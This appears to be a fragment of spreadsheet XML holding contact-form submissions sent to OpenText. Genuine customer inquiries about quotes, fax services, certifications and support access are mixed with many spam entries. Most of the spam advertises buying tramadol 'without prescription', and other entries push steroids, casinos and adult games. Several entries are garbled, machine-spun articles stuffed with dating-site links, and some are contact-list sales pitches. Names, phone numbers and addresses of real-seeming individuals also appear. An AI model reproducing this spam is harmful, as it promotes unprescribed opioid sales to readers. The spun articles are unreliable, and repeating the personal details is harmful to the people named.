    <t>ultram &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol hcl 50 mg tablet&lt;/a&gt; tramadol without written prescription | [url=https://ultramadolhcl50mg.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>Is it possible to complete my required 32 hours to renew my EnCe certification by attending this Enterprise World 2018 conference on July 10-12?  Thanks.</t>
  </si>
  <si>
    <t>tramadol 50mg &lt;a href="https://tramadolhclonline.com/#"&gt;buy tramadol&lt;/a&gt; tramadol 100mg | [url=https://tramadolhclonline.com/#]tramadol acetaminophen[/url]</t>
  </si>
  <si>
    <t>I want to know all the certifications available for OpenText Exstream. Please provide me list of available certifications and their costing. Also, provide me the procedure for getting enrolled for the same.</t>
  </si>
  <si>
    <t>My use case of the application for the South African region. It consists of following steps:_x000D_
 _x000D_
Scan a document(from below list) and do OCR to extract information like type of document, image(if available on document), name, address, id number etc._x000D_
 _x000D_
List of documents to be scanned_x000D_
 _x000D_
Passport_x000D_
Smart ID_x000D_
Green book ID_x000D_
Driving license_x000D_
Utility bills like electricity bills etc._x000D_
I need to use MRZ functionality for application please enable it for me to take next step.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://autonabor.7rek.ru/]набор автоинструментов арсенал auto[/url]_x000D_
[url=http://autonabor.7rek.ru/]купить набор автоинструментов стелс[/url]_x000D_
[url=http://autonabor.7rek.ru/]магазин автоинструмента ялта[/url]_x000D_
[url=http://autonabor.7rek.ru/]немецкий автоинструмент наборы[/url]_x000D_
[url=http://autonabor.7rek.ru/]магазин автоинструментов в вологде[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент киров[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструменты форс цена[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент в бишкеке[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент ликота купить спб[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент елец[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструменты на грузовик[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент torx[/url]_x000D_
[url=http://autonabor.7rek.ru/]куплю автоинструмент в курске[/url]_x000D_
[url=http://autonabor.7rek.ru/]магазины автоинструментов в рязани адреса[/url]_x000D_
[url=http://autonabor.7rek.ru/]автоинструмент в беларуси[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please can you put me in contact with a DAM sales rep in UK or Europe. thanks </t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://ultramadol50mg.com/#"&gt;ultram tramadol&lt;/a&gt; buy tramadol online | [url=https://ultramadol50mg.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t>Pls. get someone to contact me as we are planning to move our on premise RIghtFax to cloud. I have sent an inquiry few days back and yet no one has reached me yet.</t>
  </si>
  <si>
    <t>I did not get an email conformation to my order and payment. I need to download theproduct (licence) right away to use it... Please inform me. regards Arnaud</t>
  </si>
  <si>
    <t>Please delete my OpenText Connect account. I have no need for it anymore.</t>
  </si>
  <si>
    <t>tramadol online mail order pharmacies &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol acetaminophen&lt;/a&gt; ultram tramadol | [url=https://tramadol50mgg.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>buy tramadol &lt;a href="https://ultramadolhcl50mg.com/#"&gt;buy tramadol online&lt;/a&gt; tramadol online | [url=https://ultramadolhcl50mg.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t>tramadol 50mg &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol opioid&lt;/a&gt; tramadol 50 mg | [url=https://tramadolhclonline.com/#]tramadol opioid[/url]</t>
  </si>
  <si>
    <t>when I click on my support under my profile I receive a message saying I don't have access, but if I click on the Support menu and click the Go To My Support, I am able to log in. Could my account please be syncronised to enable quick access to my support as I have confirmed my registration several times and it doesn't seem to work. _x000D_
_x000D_
"Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process"</t>
  </si>
  <si>
    <t>Cool System V6.0 migration</t>
  </si>
  <si>
    <t>AnaInGreen ough_x000D_
_x000D_
Xlyfzox 196 spots published 14 days earlier_x000D_
_x000D_
those "reddish turn" is still still living and then to be honest by using publicity._x000D_
_x000D_
efficient continuously reminded due to advertising or babbling skulls that a lot of "when it cant be found appear USA, We became a poor, shortage attacked communist country to be Cuba actually Venezuela,_x000D_
_x000D_
that experts claim post is just as your old as i'm able to brain, But it turns out that Cuba sustained those same two hurricanes (literally, One advisors have been stronger-hitting when it brought in landfall throughout generally there, IIRC) And had operational in less than a week, despite the fact learning to be a communist u. s,world. meanwhile page rank, [url=https://twitter.com/charmdatereview]charmdate review[/url] joining the "galaxy innovative as well as,while reliable financial system" is simply. definitely, you are aware how it is._x000D_
_x000D_
I believe it is exactly what u/Me_ADC_Me_SMASH is forward all over._x000D_
_x000D_
AnaInGreen 1 goal written 6 months backwards_x000D_
_x000D_
morning method prohibited to use Reddt?_x000D_
_x000D_
I previously been executing ever previously weekday as being the quake huge success, I am able to use my mobile or portable phone during my cars ride your bike to exert effort (for a voyager) and in addition during my lunch meal smash._x000D_
_x000D_
And to get a improving, i needed go to the hospital on tuesday the fact that I moved with a moldy toenail a pierced my very own clogs truth acquiring zinc, woodgrain effect and simply garbage as a result of what remained on numerous home owners having Toa Baja._x000D_
_x000D_
reasons why put on you're going make moves useful [url=https://www.crunchbase.com/organization/charmdate#/entity]charmdate review[/url] regarding berating typhoon persons?_x000D_
_x000D_
AnaInGreen 36 suggestions placed 7 months previously_x000D_
_x000D_
"If you think about the every single and every health issues should be a scary, yet if you appear at a real problem as with Katrina and yourself brows through the big thousands of people that</t>
  </si>
  <si>
    <t xml:space="preserve">Was your company "AXSPoint" renamed to "OpenText"? </t>
  </si>
  <si>
    <t>I would like to apply for an internship to comply with my school's requirements.</t>
  </si>
  <si>
    <t>tramadol generic &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol generic&lt;/a&gt; ultram 50 mg | [url=https://ultramadol50mg.com/#]tramadol 100mg[/url]</t>
  </si>
  <si>
    <t>situation in great britain when it comes to french criminals relating to conflict_x000D_
_x000D_
all over 1946, the year after the end of most world war Two, the 400,000 in german criminals for confrontation (POWs) remained as becoming held in britain, from POW camps the actual internet outskirts of all locations. Clement Attlee's make fights govt deliberately ignored the Geneva meeting according to declining in order to allow Germans return back dwelling up till efficiently in the event the had over._x000D_
_x000D_
throughout the time of 1946, to one fifth of all of the farmville farm operate in england was being carried out by german born POWs, And we were holding additionally put to use for freeway books and building site. Fraternisation between members of the military and the regional folks turned out to be stringently forbidden because of the mediterranean u. s,presidency, but repatriation elevated awesome little. the prohibition upon fraternisatioffers conclusively lifted just in time for xmas 1946. In locations all over england, several individuals thought i would that fight behind them then ask chinese POWs to join them for family members easter the first the him achieved experienced in several._x000D_
_x000D_
inside Oswaldtwistle Lancashire, One Methodist minister, mr Howe, inquired an individual's congregation [url=http://charmingdate-fake-or-not.over-blog.com/]charmingdate[/url] whether they will like to invite a the german language POW due to their property's with respect to the holidays day. the exact result appeared to be very warm hearted and then comprehensive. Sixty POWs spotted individual near sensitive property on that day._x000D_
_x000D_
john Clarke, where previously worked which has a typewriting institution in madrid, together with the girls children acquired when two criminals. available as managed to john Haworth, a short time ago came home against six years in the raf: 'No you possibly can write uk, as well as could hardly have a discussion languages like german. still,but unfortunately a</t>
  </si>
  <si>
    <t>Would like to discuss comprehensive EIM solutions that support all our needs.</t>
  </si>
  <si>
    <t>tvqowu@tulnl.xyz</t>
  </si>
  <si>
    <t xml:space="preserve">You never know what will set her off. A while ago it was cleanliness and shed inspect me after every bath._x000D_
 [url=https://gobidesserts.wordpress.com]buy cake online[/url] Both men were struggling painfully to their feet, holding their hands tenderly against heads and groins as if to protect them. They stared down at their own naked bodies._x000D_
</t>
  </si>
  <si>
    <t>tramadol 50mg &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol 50 mg tablet&lt;/a&gt; tramadol generic | [url=https://tramadolhclonline.com/#]tramadol online mail order pharmacies[/url]</t>
  </si>
  <si>
    <t>tramadol opioid &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol acetaminophen&lt;/a&gt; tramadol medication | [url=https://ultramadolhcl50mg.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>Daimler Trucks North America recently bought 7,000 licenses from OpenText for Content Server and 4 other products.  I will help implement these products and would like to request access to Knowledge Center.</t>
  </si>
  <si>
    <t>I am looking to deploy an electronic QMS for our organization.   Can you provide more information on your QMS for the life science industry and pricing?</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol online mail order pharmacies&lt;/a&gt; tramadol hcl | [url=https://tramadol50mgg.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>Demo requested</t>
  </si>
  <si>
    <t>Looking to move to an efax solution and would like some quotes</t>
  </si>
  <si>
    <t>Good Morning_x000D_
_x000D_
I am contacting you as I need assistance in obtaining an urgent quote from your company for software which you produce.  _x000D_
I am obviously keen to seek the best quote possible so I need to provide some company detail to assist you with the most competitive and appropriate licencing model._x000D_
_x000D_
I am the Service Desk Manager at the National Oceanography Centre which is currently a NERC centre.  However our organisational status will potentially be changing from a NERC centre to Charitable Status Limited by Guarantee (CLG) and it is under this new Charitable Status that I need to seek potential quotes._x000D_
Full organisational details are summarised in the following table:_x000D_
_x000D_
Organisational Details	_x000D_
_x000D_
Name	National Oceanography Centre_x000D_
_x000D_
Current organisational status (2017/2018)	The National Oceanography Centre is currently a NERC (Natural Environment Research Council) research centre. _x000D_
NERC is the UK's largest funder of independent environmental science, training and innovation, delivered through universities and research centres._x000D_
_x000D_
Future organisational status (2018/2019)	Charitable Status Limited by Guarantee (CLG). Registered with the Charities Commission._x000D_
_x000D_
Nature of business	Primarily focussing upon non-profit scientific research._x000D_
_x000D_
Address	_x000D_
Site 1: National Oceanography Centre, European Way, Southampton, SO14 3ZH_x000D_
Site 2: National Oceanography Centre, Joseph Proudman Building, 6 Brownlow Street_x000D_
Liverpool, L3 5DA_x000D_
_x000D_
No of Employees	600_x000D_
_x000D_
What I exactly need is quotes for software based on the both the following licencing models if appropriate:_x000D_
1.	Licences purchased on an individual basis (nodes)._x000D_
2.	A site licence to cover all employees over both sites._x000D_
_x000D_
If possible please supply me with direct quotes via email or if not then please email me back a contact name and number for me to call._x000D_
Ideally I am looking to get quotes by the end of today (11/5/18) which I am hoping you will be able to assist with._x000D_
I am not in the office today so not con</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to migrating our analog fax services to an efax solution </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/nords][img]http://lastnewstoday.ru/pr/nords/images/1.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/nords]игры для взрослых играть онлайн бесплатно _x000D_
[/url] _x000D_
 _x000D_
 _x000D_
онлайн игры для взрослых видео _x000D_
секс игры для взрослых играть онлайн _x000D_
интеллектуальные игры для взрослых онлайн _x000D_
мини игры для взрослых онлайн бесплатно _x000D_
новейшие онлайн игры взрослых _x000D_
русские порно игры для взрослых онлайн _x000D_
мини игры онлайн играть бесплатно для взрослых _x000D_
игры взрослых головоломка онлайн _x000D_
онлайн игра найди отличия для взрослых _x000D_
сериал взрослые игры смотреть онлайн бесплатно _x000D_
мачеха взрослые игры онлайн _x000D_
взрослые игры сериал онлайн бесплатно _x000D_
бесплатные онлайн игры для взрослых медсестра _x000D_
настольные игры для взрослых онлайн _x000D_
развивающие игры для взрослых ру онлайн _x000D_
игры онлайн для взрослых секретарша _x000D_
игра взрослых девочек смотреть онлайн _x000D_
мачеха взрослые игры смотреть онлайн _x000D_
игры онлайн для развития памяти взрослым _x000D_
онлайн игры для взрослых мужчины _x000D_
взрослые игры 2 смотреть онлайн _x000D_
игры бродилки взрослые онлайн _x000D_
онлайн игры для взрослых топ _x000D_
кино онлайн взрослые игры _x000D_
взрослые игры онлайн все серии _x000D_
игры играть онлайн гонки взрослые _x000D_
смотреть онлайн взрослые игры все серии _x000D_
игры для взрослых онлайн бесплатно секретарша _x000D_
онлайн игры приключения для взрослых _x000D_
</t>
  </si>
  <si>
    <t>Forgot password and my email changed since password was issued</t>
  </si>
  <si>
    <t>tramadol withdrawal &lt;a href="https://buytramadolhcl.com/#"&gt;buy tramadol online without prescription&lt;/a&gt; buy tramadol online | [url=https://buytramadolhcl.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>Hi, I am the director of the OpenText OEM sales team that specializes on these capture toolkits.  I am trying to determine where leads go when customers complete this form.  Please contact me via phone of email.  _x000D_
_x000D_
thanks!</t>
  </si>
  <si>
    <t>painkillers online with next day delivery &lt;a href="https://onlinetramadolhcl.com/#"&gt;tramadol opioid&lt;/a&gt; tramadol hcl 50 mg | [url=https://onlinetramadolhcl.com/#]tramadol 50mg[/url]</t>
  </si>
  <si>
    <t>tramadol overnight 180 &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol hcl 50 mg&lt;/a&gt; tramadol 50mg | [url=https://onlinetramadol24.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>I was wanting to check if we have a current support contract for our ApplicationXtender product. What information would you need from me to make this determination? What versions of AX are currently supported?</t>
  </si>
  <si>
    <t>Changed voice carried and phone system.  Faxes are coming into the system but are not being sorted correctly.</t>
  </si>
  <si>
    <t xml:space="preserve">wanting to purchase brava reader and have some questions  </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for sales point of contact...looking to learn about your document management capabilities. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Guidance team,_x000D_
_x000D_
I am working with CompTIA, a leading provider of IT certifications, on securing copyright permissions for the textbook/study guide for their Security+ exam in which they would like to include a screen capture of the EnCase Forensic Windows Artifact Parser. The image is used in a tutorial and does not imply that Guidance Software is affiliated with or endorses CompTIA in any way. I am writing to inquire what your policy is on screenshot usage and, if permission is required, to whom I should send the request._x000D_
_x000D_
I appreciate the help. Have a wonderful day._x000D_
_x000D_
Best,_x000D_
Moira Byrne_x000D_
</t>
  </si>
  <si>
    <t>Need a quote for my customer University of Louisville Physicians</t>
  </si>
  <si>
    <t>I'd like to see investor info in a format I can easily print and read. The current format is something I don't understand. With other companies I can easily copy each page of the report and paste it to word to print a hard copy. That format allows me to put three or four pages on each word page and save on printing costs. I try going through and printing only selected pages and you give me the page of the report scrunched up into the top third of the page anyway. I realize I'm not particularly up to date with technical abilities, but as a senior I find it easier to read this way. Please don't call me now. I don't have a cell phone and  I'm not at home right now. I'd like to think a company that specializes in documents as a primary service, could do a better job of this.</t>
  </si>
  <si>
    <t xml:space="preserve">The U.S.A.. Guess which has the most repressive attitudes towards sex and sexuality._x000D_
 [url=http://gobi.com.sg]buy cake online[/url] True, but its no different from the other mainstream religious corporations, and not illegal._x000D_
</t>
  </si>
  <si>
    <t>this is a test after one customer, Chase Kowalski &lt;chase.kowalski@nexcess.net&gt;,  said "Your contact form is not operating properly"</t>
  </si>
  <si>
    <t>Interested in more information and pricing on your Fax2Mail service</t>
  </si>
  <si>
    <t>We looking for and alternative or replacement solution for EMC Disk-Extenter  achieving data to a centera.</t>
  </si>
  <si>
    <t>Nossa empresa está buscando uma eventual parceria para projeto de implantação e sustentação de uma solução ECM. _x000D_
_x000D_
Temos um pool de requirements (arquiteturais e funcionais)._x000D_
_x000D_
Agradecemos o contato.</t>
  </si>
  <si>
    <t>I tried searching for 9898378069 in my system. The login for Pierson Kolhbeck appears, but the number doesn't appear in his fax number listing. Is it blocked or hidden?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.herbinorte.com.br/nav/menu.php?nav=454]Clomiphene Citrate Price Canada[/url]_x000D_
 Begin slow. First-time traders are typically disappointed from purchasing many properties in a short time period of time. Cash flow troubles could occur, which makes it difficult for the dog owner to stability all of their new duties. As opposed to get disappointed, this is a better thought to buy one particular home at the beginning._x000D_
  [url=http://www.tempel.ind.br/css/assets.php?bn=64]Cialis PreÃ§o 2 Comprimidos[/url]_x000D_
 If you buy a auto, you have to invest period in understanding concerning how to create the method less difficult to you. You need to get the skills essential in tipping the scales inside your prefer. The good news is for you personally, you've identified this article and you will be armed with exactly the knowledge you need when you're done reading through it._x000D_
  [url=http://www.airtonsouza.com.br/language/list.php?option=315-Cheap-Oxandrolone,Sildenafil-Citrate-Powder-Suppliers,Trenbolone-Acetate-Benefits.html]Cheap Oxandrolone[/url]_x000D_
 To summarize, it is important to know that picture taking involves so much more than directing a camera and pushing a button. So that you can take into account what you do as craft, there are actually certain requirements that you just usually have to abide by. With any luck , it will be possible to make use of the information in this post to your advantage.Issues That You Should Know Relating to Hair Loss_x000D_
  [url=http://www.sawa.com/wp-content/uploads/notelet.php?d=222-Buy-Nandrolone-Decanoate,Clomiphene-Citrate-Australia,Methandienone-Wholesale]Buy Nandrolone Decanoate[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for a better way to manage internal document to meet ISO 9001. 360 SharePoint is not meeting our needs</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
The Government of Alberta - Justice and Solicitor has a bid for OpenText Products and I was wondering if you would be able to assist me with a quote._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Edward</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
 _x000D_
Hope you’re doing well. _x000D_
 _x000D_
Would you be interested in a list of decision makers sectors  across nation for your _x000D_
_x000D_
upcoming business solutions?_x000D_
 _x000D_
We provide complete contact information including email, phone and all other business _x000D_
_x000D_
information._x000D_
 _x000D_
Data Fields: COMPANY NAME, CONTACT NAME, TITLE, PHONE NUMBER, EMAIL ADDRESS, MAILING _x000D_
_x000D_
ADDRESS, WEBSITE ADDRESS, INDUSTRY, NO OF EMPLOYEES, REVENUE SIZE etc. _x000D_
 _x000D_
Share your thoughts so we can proceed further.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
Good day to you!_x000D_
_x000D_
Would you be interested to get in touch with Key Decision Makers for your Business marketing?_x000D_
_x000D_
Data fields included: The list includes 100% permission based opt-in email addresses and verified telephone numbers along with complete marketing information such as contact name, company name, title, fax number, postal address, zip code, annual sales size, employee size, Industry, website, etc._x000D_
_x000D_
Do let me know so I can get back to you with more details like available counts, pricing and sample data for your reference._x000D_
_x000D_
Awaiting your response._x000D_
_x000D_
Regards_x000D_
Brandi Jarrod_x000D_
Business Development Manager _x000D_
United States_x000D_
Global Database Consultants_x000D_
</t>
  </si>
  <si>
    <t>We are looking for assistance with various aspects of the content server product.  Wondering if you are able to or have outside resource contact of a company or a person that is able to walk us through many of the hurdles associated with setting up and using content server effectively.</t>
  </si>
  <si>
    <t>tramadol hcl &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol 100mg&lt;/a&gt; tramadol 50 mg tablet | [url=https://buytramadolhcl.com/#]ultram tramadol[/url]</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to understand more about OpenText Brava software used to annotations. I would appreciate if you could give me a call at 949-610-5657._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>buy tramadol online without prescription &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol overnight 180&lt;/a&gt; painkillers online with next day delivery | [url=https://onlinetramadol24.com/#]tramadol 50mg[/url]</t>
  </si>
  <si>
    <t>tramadol 50 mg &lt;a href="https://onlinetramadolhcl.com/#"&gt;tramadol withdrawal&lt;/a&gt; tramadol overnight 180 | [url=https://onlinetramadolhcl.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently reviewing options to refresh our Rightfax servers._x000D_
Ministry of Health sends and receives approximately 900K pages of fax per year._x000D_
_x000D_
To help simplify the cost model, does OpenText offer any cloud services option which can replace the Ministry's physical devices?_x000D_
_x000D_
We are looking for a quotation of a proposed solution by 5/15 if possible.  _x000D_
Feel free to contact me at: 437-779-8712  </t>
  </si>
  <si>
    <t>tramadol without written prescription &lt;a href="https://buytramadol50mgg.com/#"&gt;ultram&lt;/a&gt; tramadol 50 mg tablet | [url=https://buytramadol50mgg.com/#]tramadol 100mg[/url]</t>
  </si>
  <si>
    <t>Question: I received another spam fax, from some HR Department on some travel trip. There is no fax number that it was sent from.  I have had them before.  Is there anyway I can "code" my account to not accept any faxes coming in that do not have the return fax number it came from?  This scam is a pain in my butt..............sorry!!!!!  Fax came into my fax number today:  646-587-5714</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
_x000D_
Good day._x000D_
_x000D_
Would you be interested to get in touch with Key Decision Makers across B2B industry sector as mentioned below. We provide complete contact information like dual verified Opt-in Email address, direct Phone no and other business information._x000D_
_x000D_
Below are the Industry sector, Job titles and Geographies we service:_x000D_
_x000D_
Industries : Mining, Oil &amp; Gas, Food &amp; Beverage, Pharmaceutical, Biotechnology, Chemical, Construction, Automotive, Aerospace, Aviation, Marine, Manufacturing, Energy, Travel &amp; Tourism, Wholesale, Retail, Finance, Real Estate, Information Technology, Hospitality, Leisure, Healthcare, Business Services._x000D_
_x000D_
Job Titles : CEO, CFO, CMO, CTO, CRO, President, Owners, Founders, Chairman, Managing Directors, VP, Directors, Managers and other decision makers._x000D_
_x000D_
Kindly let me know your specifications so that I shall send across more details accordingly._x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Judy Harrison_x000D_
Business Development Manager _x000D_
</t>
  </si>
  <si>
    <t>Gostaria muito de instalar um versão para teste da aplicação OpenText Gupta Team Developer, mas o link está quebrado.</t>
  </si>
  <si>
    <t>Interested in Documentum product.</t>
  </si>
  <si>
    <t>I am looking for a video of the xPression admin course. I would like to go through the course again, but my company will not pay for it. I took the course 2 years ago, but now I am a lot more familiar with xPression. I think it would be helpful to go through the course again. Is there any way to get a video copy of the course?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
          I just received a new software requirement today and request a quote for the following.  Request the quote has support renewal date of August 31, 2019._x000D_
_x000D_
1 each - EnCase Guidance Software_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Peter Lambert_x000D_
Quartermaster_x000D_
Charles County Sheriff’s Office_x000D_
10435 Audie Lane_x000D_
La Plata, MD  20646_x000D_
301-609-6249_x000D_
Fax: 301-932-2377_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Is your product cloud-based or hosted?</t>
  </si>
  <si>
    <t xml:space="preserve">I don't seem to be able to get MySupport activated._x000D_
The university should have an active subscription until the 31 July 2019 </t>
  </si>
  <si>
    <t>Request a copy of a claim  POEC105094 $550.00</t>
  </si>
  <si>
    <t>Hi I was wondering if the Brava image license is a permanent license, what the maintenance fee is for, and when/if/how often the maintenance fee/license needs to be renewed?_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I need to know if v11.0.2 is compatible with Dynamics 365.  Is it the latest version, or is an upgrade required.</t>
  </si>
  <si>
    <t>buy tramadol online without prescription &lt;a href="https://buytramadolhcl.com/#"&gt;ultram tramadol&lt;/a&gt; tramadol hydrochloride | [url=https://buytramadolhcl.com/#]buy tramadol online[/url]</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;play casino games online&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
I am working on a venture with BPAY group in Australia. _x000D_
_x000D_
As part of the work we are doing with BPAY we are looking to source a large number of bills &amp; invoices. I was wondering if you or someone in your team would be open to exploring if you or any of your customers would be open to providing access to a sample of invoices to help in this regard. We are open to discussing commercial options if you can point us in the right direction._x000D_
_x000D_
Appreciate your help or advice in advance._x000D_
_x000D_
Kind regards,_x000D_
Dave</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>'Mean Girls' happens to be A musical_x000D_
_x000D_
For several, should they [url=http://charmingdate-fake-or-not.over-blog.com/]charmingdate[/url] perceive "get" plus "is considered to be butter a carbohydrate, the one thing pops into their heads: nasty your girls._x000D_
_x000D_
If you're not familiar with average young women, here's a quick backside argument: in early 2000s, Tina Fey research Rosalind Wiseman's [url=https://www.datingsitesreviews.com.au/russian-dating/CharmingDate.htm]charmingdate[/url] nonfiction file full Bees or Wannabes, inside regards to choir of adolescent young girls and thus his or her frequently dysfunctional happen to be.. you possessed to kinda respect a person's thinking ability and also whelm of it. as well as, it must stop. completely like a novel packed with connect villains,_x000D_
_x000D_
bad guy no way. 1 all over denote little girls is in fact Rega George, the new golden-haired who exactly everyone wants to fantastic, apart from your malefic streak. princess bee Regina and / or the ex wannabes are typically in a clique the plastic materials. (each friday, these slip on pink colored.) Cady, the modern young woman, requires while. after which you can there can be Janis, the brand new in the story plot. she gets a painter who was simply injure simply by your one valuable time relation Regina to would love nothing related to the girls who fit baby pink._x000D_
_x000D_
Fey promises, with regard to graduating high school, your mom was a dash of each personality. "i an efficient school, still active while in choir in addition to the publisher your day classifieds played out activity one. and while, irealised i was used through jealously of people which i thought overall were presence as cool as what I had. and i believe that you should conscious poisoning by doing so, and i believe I did not really completely understand that, as options variety venomous humorousness certainly despondent some. i didn't be aware that until I was about 30 years of age,_x000D_
_x000D_
Fey feels which is the reason</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
we have renewed the maintenance for 40 Exceed licenses through our Reseller Partner._x000D_
We need to install the upgraded version of the product so we need indications about how to download it._x000D_
We have also requested an add-on for SSH connectivity: there is an issue between our reseller and Opentext so the purchase order for this item is not yet formalized._x000D_
Since we need to use this add-on, we have had assurance by our reference person in Opentext Simona Fisichella (Simona Fisichella &lt;sfisiche@opentext.com&gt;) that we can download temporary Keys until the issue is solved._x000D_
Looking forward to hearing from you soon_x000D_
Best Regards_x000D_
Matteo Gianelli  _x000D_
_x000D_
Reference to the purchase order towards the reseller:_x000D_
1000025417_x000D_
Exceed PowerSuite Single License_x000D_
(Electronic) Maintenance_x000D_
2018-01-01 to 2018-12-31_x000D_
V0554-72000_x000D_
Unique #: V0554-72000_x000D_
</t>
  </si>
  <si>
    <t>Looking for information on eDOCs.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you please inform me about a specification of Enterprise Scan program. Is there any specification that warns me when multi paper passed at once from feeder? If yes Iwant to enable it._x000D_
Thanks in advance._x000D_
Regards</t>
  </si>
  <si>
    <t>buy tramadol online without prior prescription &lt;a href="https://onlinetramadol24.com/#"&gt;buy tramadol 50mg online&lt;/a&gt; buy tramadol online no prescription | [url=https://onlinetramadol24.com/#]buy tramadol online no rx[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope you’re doing well!_x000D_
_x000D_
I am Ryan Joseph I had a chance to go through your company’s website and I hope our Life Sciences Industry Leads can help you to Boost up your sales with our verified Direct Contact numbers and email contacts you can reach your Active Clients and increase your sales._x000D_
_x000D_
So, would you be interested in connecting with Active Decision makers?_x000D_
_x000D_
Target Titles/Fuctions:_x000D_
_x000D_
•	Director_x000D_
•	Owners_x000D_
•	CEO/President/ Vice President_x000D_
•	Scientist_x000D_
•	Specialist_x000D_
•	Coordinator_x000D_
•	Biotechnologist_x000D_
•	CRO Professionals_x000D_
•	Combination Products Manager_x000D_
•	Pharmacovigilance/Clinical Safety  Manager _x000D_
•	Procurement Manager_x000D_
•	Sourcing Manager_x000D_
•	Medical Devices/Combination Products_x000D_
•	Doctors _x000D_
•	Diagnostic Professionals_x000D_
•	Consultant_x000D_
•	Clinical Data Management/e- Clinical_x000D_
•	Clinical Researcher _x000D_
•	Project Management_x000D_
•	Other Related To This Industry  _x000D_
_x000D_
Segment:-_x000D_
_x000D_
•	Regulatory Affairs/Compliance_x000D_
•	Research And Development_x000D_
•	Regulatory Submissions_x000D_
•	Good Clinical Practice_x000D_
•	Contract Research_x000D_
•	Organizations_x000D_
•	Clinical R&amp;D _x000D_
•	Generics And OTC_x000D_
•	Medical/ Devices/ Diagnostics/ Generics_x000D_
•	Pharmaceuticals Companies _x000D_
•	Medical Communications/Medical Affairs_x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
_x000D_
List Details:_x000D_
_x000D_
	Format: Excel spreadsheet._x000D_
	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
_x000D_
Please help me with your Target market (Title/ Industry /Location) and I will get back to you with Data counts, Cost and Benefits._x000D_
_x000D_
Warm Regards,_x000D_
Ryan Joseph_x000D_
Marketing Executive_x000D_
Business to Business|E-mail and Data Services |USA/UK_x000D_
4269 Express Lane, Sarasota, FL 34238 USA_x000D_
Email: ryan.josep@aol.com _x000D_
_________________________________________x000D_
If you're not interested please reply subject line </t>
  </si>
  <si>
    <t>buy tramadol online pharmacy &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol 50mg&lt;/a&gt; buy tramadol overnight shipping | [url=https://buytramadolhcl.com/#]buy tramadol overnight cod[/url]</t>
  </si>
  <si>
    <t>tramadol without written prescription &lt;a href="https://buytramadol50mgg.com/#"&gt;buy tramadol 180&lt;/a&gt; ultram tramadol | [url=https://buytramadol50mgg.com/#]100mg tramadol[/url]</t>
  </si>
  <si>
    <t>buy tramadol rx &lt;a href="https://onlinetramadol24.com/#"&gt;buy generic tramadol&lt;/a&gt; how to get bottom tramadol online | [url=https://onlinetramadol24.com/#]buy tramadol online no rx[/url]</t>
  </si>
